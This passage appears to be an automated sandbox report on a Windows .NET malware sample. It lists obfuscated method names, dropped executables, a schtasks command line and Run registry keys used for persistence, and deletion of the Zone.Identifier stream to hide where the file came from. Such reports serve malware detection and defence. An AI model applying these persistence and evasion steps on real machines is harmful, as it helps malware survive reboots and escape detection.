                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, oMCiUjzBPeF7qtcIEJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'crQqjKy5XP', 'hhlquCSa7y', 'VGhqHL7qX9', 'MQNqXkUJjN', 'f4UqvJErH1', 'PuNqqSWOx0', 'E4pqUH5KTS'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, ThEZhyRCdPQ7r5qvcH.csHigh entropy of concatenated method names: 'YjZvFgEgMN', 'M2Ev3mdMMZ', 'worvttnUyn', 'fH5vl3OnRH', 'kUNv8tq2WS', 'wxvv9N2g0n', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, WasSmoV6KYddoY1pevK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r1SU8WS8qg', 'hibU7aeUSg', 'LaJUYV9fWu', 'tixU0WnHE7', 'UXyUK2WxqC', 'Rk6UwPlJho', 'oesUcoD4f5'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, vhekVySNHNEF6vdGNR.csHigh entropy of concatenated method names: 'mTqdomHDVI', 'DvwdGaKoP3', 'OoXdb3FbNk', 'ITadSMUEEQ', 'MywduV0rVh', 'vDldH1nCo3', 'rsddXdSRBU', 'Yv1dv7KkGT', 'MQsdqhKEnh', 'Yb7dUsBTUQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, bcouJr0nu7QPUXcCVJ.csHigh entropy of concatenated method names: 'QFDXMQ5MmB', 'w4oXe7hW4R', 'ToString', 'IqZXI4u7bI', 'vTiXP4kc8r', 'RxTXd7evs9', 'TBiXpEX7xe', 'cu8XL6k2OY', 'J7UXk9C9Sr', 'hmdXNLxVPQ'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, sdWILBNvBBU0paUJK3.csHigh entropy of concatenated method names: 'LQl6seIjsN', 'V8k6Icm0F5', 'r396PkUnEv', 'wGl6dhUdJZ', 'p6e6pQin4c', 'sO96Lmng4o', 'pmT6koy0Ge', 'xfH6NC9OJd', 'SUd61gU5XX', 'bfD6MEk9UM'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.7360000.8.raw.unpack, yhro0WgmvOHNbOvbd4.csHigh entropy of concatenated method names: 'egKVkgSrkn', 'dKcVN7CbTn', 'KNHVMNEF6v', 'hGNVeRcqmA', 'jiWVuA5Zx9', 'ePcVHZXm1k', 'aVerSb46eerbTokZDe', 'o9gy7qxItucd1FhJVV', 'Q35VVqWZlA', 'eV4V6Pa2Ql'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.54a0000.6.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                    Source: 0.2.oBMlky3Rkm7h5QK.exe.2df44e0.0.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeFile created: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qZeUnRJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qZeUnRJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
